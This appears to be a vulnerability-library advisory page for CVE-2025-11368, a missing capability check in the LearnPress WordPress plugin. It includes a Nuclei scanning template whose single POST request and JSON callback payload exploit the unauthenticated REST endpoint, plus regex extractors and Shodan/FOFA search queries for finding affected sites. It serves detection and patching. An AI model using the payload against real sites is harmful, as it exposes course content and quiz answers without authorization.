/Vulnerability Library

LearnPress < 4.3.0 - Arbitrary Callback Execution to Information Exposure

CVE-2025-11368
Early Release

Description

The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 4.2.9.4. This is due to missing capability checks in the REST endpoint /wp-json/lp/v1/load_content_via_ajax which allows arbitrary callback execution of admin-only template methods. This makes it possible for unauthenticated attackers to retrieve admin curriculum HTML, quiz questions with correct answers, course materials, and other sensitive educational content via the REST API endpoint granted they can supply valid numeric IDs.

Severity

Medium

CVSS Score

5.3

Exploit Probability

2%

Affected Product

learnpress

Published Date

February 7, 2026

Template Author

pussycat0x

CVE-2025-11368.yaml
id: CVE-2025-11368

info:
  name: LearnPress < 4.3.0 - Arbitrary Callback Execution to Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 4.2.9.4. This is due to missing capability checks in the REST endpoint /wp-json/lp/v1/load_content_via_ajax which allows arbitrary callback execution of admin-only template methods. This makes it possible for unauthenticated attackers to retrieve admin curriculum HTML, quiz questions with correct answers, course materials, and other sensitive educational content via the REST API endpoint granted they can supply valid numeric IDs.
  impact: |
    Unauthenticated attackers can access sensitive admin curriculum, quiz answers, and course materials, compromising educational content confidentiality.
  remediation: Update to the latest version beyond 4.2.9.4.
  reference:
    - https://wpscan.com/vulnerability/5c40d803-87b3-437b-b514-1e85b43371a0/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-11368
    epss-score: 0.01994
    epss-percentile: 0.83273
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2025,wordpress,wp-scan,wp-plugin,wp-scan,learnpress

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-json/lp/v1/load_content_via_ajax"

    headers:
      Content-Type: application/json

    body: '{"callback":{"class":"LearnPress\\TemplateHooks\\Course\\ListCoursesTemplate","method":"render_courses"},"args":{}}'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"status":"success"'

      - type: word
        part: body
        words:
          - 'course-item'
          - 'course-title'
          - 'course-permalink'
          - 'learn-press-courses'
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: course_title
        part: body
        regex:
          - "course-title['\"]>([^<]+)<"
        group: 1

      - type: regex
        name: course_count
        part: body
        regex:
          - 'course-count-lesson[^>]*>([^<]+)<'
        group: 1
# digest: 4a0a0047304502204bfbffee78424d167ed9bcde5e9ca09cfba67ff18e544035a5609cd219bb5ecb022100bd0c8ad6181c9dff6e121e45c80739cf59393970c75b1e3999576efc9e062f67:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2025-11368
CWE ID:
cwe-200

References

https://wpscan.com/vulnerability/5c40d803-87b3-437b-b514-1e85b43371a0/

Remediation Steps

Update to the latest version beyond 4.2.9.4.